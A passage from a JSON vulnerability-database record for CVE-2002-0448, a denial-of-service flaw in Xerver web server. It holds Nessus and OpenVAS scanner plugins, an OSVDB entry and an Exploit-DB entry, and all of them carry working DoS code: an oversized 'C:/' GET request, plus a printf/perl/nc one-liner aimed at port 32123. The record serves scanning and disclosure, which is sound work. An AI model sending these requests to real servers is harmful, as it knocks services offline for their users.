script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/03/08\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Xerver DoS\");\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 32123);\n exit(0);\n}\n\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:32123, embedded: 0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\ns = strcat('GET /', crap(data:\"C:/\", length:1500000), '\\r\\n\\r\\n');\nsend(socket:soc, data:s);\nclose(soc);\n\nif (service_is_dead(port: port) > 0)\n security_warning(port);\n", "title": "Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:58:25"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2002-0448"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "It is possible to crash the Xerver web server by sending a long URL\nto its administration port.", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-01-16T20:05:16", "references": [{"idList": ["OSVDB:6772"], "type": "osvdb"}, {"idList": ["EDB-ID:21336"], "type": "exploitdb"}, {"idList": ["CVE-2002-0448"], "type": "cve"}, {"idList": ["OPENVAS:136141256231011015"], "type": "openvas"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "65d289004d41ff3b1364b889025766a33d7b2a22247316523d1b5b1f6d32d82c", "hashmap": [{"hash": "ea79df5134c39c4096d904b1cb234b58", "key": "description"}, {"hash": "76d0272557711baa5bd207350ca527db", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "20370b7abae878a0affd604d714cf91f", "key": "title"}, {"hash": "aa5bc34d6bd5933dd73ae2251bff88e8", "key": "pluginID"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "de145e526e4c9db53b7f457e4476babd", "key": "references"}, {"hash": "66fd64eb53c040aa2c39d1d5cb15da44", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "c1405cc79bbfd468c35bd31823186f58", "key": "cvelist"}, {"hash": "dcbd1dea573401765a5800475c9db4d4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11015", "id": "XERVER_DOS.NASL", "lastseen": "2019-01-16T20:05:16", "modified": "2018-11-15T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "11015", "published": "2002-06-07T00:00:00", "references": ["https://seclists.org/bugtraq/2002/Mar/156", "https://seclists.org/bugtraq/2002/Mar/218"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n#\n# From Bugtraq :\n# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?\n# From:\"Alex Hernandez\" <al3xhernandez@ureach.com> \n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11015);\n script_version(\"1.25\");\n\n script_cve_id(\"CVE-2002-0448\");\n script_bugtraq_id(4254);\n\n script_name(english:\"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is prone to a denial of service attack.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to crash the Xerver web server by sending a long URL\nto its administration port.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2002/Mar/156\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2002/Mar/218\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Xerver 2.20 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/03/08\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Xerver DoS\");\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 32123);\n exit(0);\n}\n\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:32123, embedded: 0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\ns = strcat('GET /', crap(data:\"C:/\", length:1500000), '\\r\\n\\r\\n');\nsend(socket:soc, data:s);\nclose(soc);\n\nif (service_is_dead(port: port) > 0)\n security_warning(port);\n", "title": "Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 7, "lastseen": "2019-01-16T20:05:16"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "c1405cc79bbfd468c35bd31823186f58"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "0c94dc823bf586f438e8815482c066f1"}, {"key": "href", "hash": "66fd64eb53c040aa2c39d1d5cb15da44"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "07a0416e4de2a26a0531240b230d9eca"}, {"key": "pluginID", "hash": "aa5bc34d6bd5933dd73ae2251bff88e8"}, {"key": "published", "hash": "dcbd1dea573401765a5800475c9db4d4"}, {"key": "references", "hash": "de145e526e4c9db53b7f457e4476babd"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "76d0272557711baa5bd207350ca527db"}, {"key": "title", "hash": "20370b7abae878a0affd604d714cf91f"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "a568f1ac45f9d391769aaaa786948ab8c5e1b43b74919cd1da05c69e9fab54d5", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0448"]}, {"type": "osvdb", "idList": ["OSVDB:6772"]}, {"type": "exploitdb", "idList": ["EDB-ID:21336"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231011015"]}], "modified": "2019-02-21T01:07:44"}, "score": {"value": 5.7, "vector": "NONE", "modified": "2019-02-21T01:07:44"}, "vulnersScore": 5.7}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n#\n# From Bugtraq :\n# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?\n# From:\"Alex Hernandez\" <al3xhernandez@ureach.com> \n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11015);\n script_version(\"1.25\");\n\n script_cve_id(\"CVE-2002-0448\");\n script_bugtraq_id(4254);\n\n script_name(english:\"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is prone to a denial of service attack.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to crash the Xerver web server by sending a long URL\nto its administration port.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2002/Mar/156\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2002/Mar/218\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Xerver 2.20 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/03/08\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Xerver DoS\");\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 32123);\n exit(0);\n}\n\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:32123, embedded: 0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\ns = strcat('GET /', crap(data:\"C:/\", length:1500000), '\\r\\n\\r\\n');\nsend(socket:soc, data:s);\nclose(soc);\n\nif (service_is_dead(port: port) > 0)\n security_warning(port);\n", "naslFamily": "Web Servers", "pluginID": "11015", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:07:38", "bulletinFamily": "NVD", "description": "Xerver Free Web Server 2.10 and earlier allows remote attackers to cause a denial of service (crash) via an HTTP request that contains many \"C:/\" sequences.", "modified": "2008-09-05T20:28:00", "id": "CVE-2002-0448", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0448", "published": "2002-07-26T04:00:00", "title": "CVE-2002-0448", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:31:57", "bulletinFamily": "scanner", "description": "It was possible to crash the Xerver web server by sending a long URL\n (C:/C:/...C:/) to its administration port.", "modified": "2019-04-11T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011015", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011015", "title": "Xerver web server DOS", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: Xerver_DoS.nasl 4904 2017-01-02 12:45:48Z cfi $\n#\n# Xerver web server DOS\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>\n# Erik Anderson <eanders@carmichaelsecurity.com>\n# Added BugtraqID and CAN\n#\n# Copyright:\n# Copyright (C) 2002 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11015\");\n script_version(\"2019-04-11T14:06:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-11 14:06:24 +0000 (Thu, 11 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(4254);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2002-0448\");\n script_name(\"Xerver web server DOS\");\n script_category(ACT_DENIAL);\n script_copyright(\"This script is Copyright (C) 2002 Michel Arboi\");\n script_family(\"Denial of Service\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(32123);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Upgrade your software.\");\n\n script_tag(name:\"summary\", value:\"It was possible to crash the Xerver web server by sending a long URL\n (C:/C:/...C:/) to its administration port.\");\n\n script_tag(name:\"impact\", value:\"An attacker may use this attack to make this\n service crash continuously.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = 32123;\nif( ! get_port_state( port ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\ns = string( \"GET /\", crap(data:\"C:/\", length:1500000 ), \"\\r\\n\\r\\n\" );\nsend( socket:soc, data:s );\nclose( soc );\n\nif( http_is_dead( port:port ) ) {\n security_message( port:port);\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "description": "## Vulnerability Description\nXerver contains a flaw that may allow a remote denial of service. The issue is triggered when an excessive number of requests for 'C:\\' are sent to port 32123, resulting in a loss of availability for the service.\n## Solution Description\nUpgrade to version 2.20 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nXerver contains a flaw that may allow a remote denial of service. The issue is triggered when an excessive number of requests for 'C:\\' are sent to port 32123, resulting in a loss of availability for the service.\n## Manual Testing Notes\nprintf \"GET /`perl -e 'print \"C:/\"x500000'`\\r\\n\\r\\n\" |nc -vvn [victim] 32123\n## References:\nVendor URL: http://www.javascript.nu/xerver/\n[Nessus Plugin ID:11015](https://vulners.com/search?query=pluginID:11015)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-03/0091.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-03/0155.html\nISS X-Force ID: 8419\n[CVE-2002-0448](https://vulners.com/cve/CVE-2002-0448)\nBugtraq ID: 4254\n", "modified": "2002-03-08T00:00:00", "published": "2002-03-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6772", "id": "OSVDB:6772", "type": "osvdb", "title": "Xerver Free Web Server c:\\ Request DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T16:13:22", "bulletinFamily": "exploit", "description": "Xerver 2.10 Multiple Request Denial Of Service Vulnerability. CVE-2002-0448. Dos exploit for windows platform", "modified": "2002-03-08T00:00:00", "published": "2002-03-08T00:00:00", "id": "EDB-ID:21336", "href": "https://www.exploit-db.com/exploits/21336/", "type": "exploitdb", "title": "Xerver 2.10 - Multiple Request Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/4254/info\r\n\r\nXerver is a freely available webserver, written in Java. It will run on any operating system with Java installed, including Microsoft Windows, Unix/Linux variants, MacOS, etc.\r\n\r\nIt has been reported that sending an excessive number of requests for 'C:\\' to port 32123 will cause the webserver to crash, denying service to legitimate users. This appears to be the case even on non-Windows based operating systems running the vulnerable software.\r\n\r\nThe webserver will need to be restarted to regain normal functionality.\r\n\r\nThis issue was reported for v2.10 of Xerver. Earlier versions may also be affected.\r\n\r\n\r\nprintf \"GET /`perl -e 'print \"C:/\"x500000'`\\r\\n\\r\\n\" |nc -vvn 127.0.0.1 32123 ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21336/"}]}
